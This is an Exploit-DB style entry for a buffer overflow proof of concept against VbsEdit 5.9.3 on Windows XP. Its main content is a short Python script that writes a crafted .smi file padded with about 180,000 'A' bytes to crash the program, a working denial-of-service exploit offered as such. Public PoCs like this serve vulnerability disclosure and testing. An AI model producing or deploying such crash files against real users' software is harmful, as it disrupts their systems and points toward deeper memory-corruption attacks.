VbsEdit 5.9.3 - '.smi' Buffer Overflow (PoC)
Author: d3b4g type: dos platform: windows port: date_added: 2013-07-22 date_updated: 2013-07-22 verified: 1 codes: OSVDB-95531 tags: aliases: screenshot_url: http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-07-22-at-85119-am.png application_url: http://www.exploit-db.comvbsedit.exe raw file: 27010.txt
# Exploit Title: VbsEdit 5.9.3(.smi file handling) Buffer overflow vulnerability # Date: 22.7.2013 # Exploit Author: d3b4g # Vendor Homepage:http://www.vbsedit.com/ # Software Link: http://www.vbsedit.com/ # Tested on: Windows XP SP3 # Twitter: @schaba #!/usr/bin/python # Tested on: win XPsp3 chars = "A"*90000 crush = "\x41\x41\x41\x41" file=open('exp.smi','w') file.write(chars+crush+chars) file.close()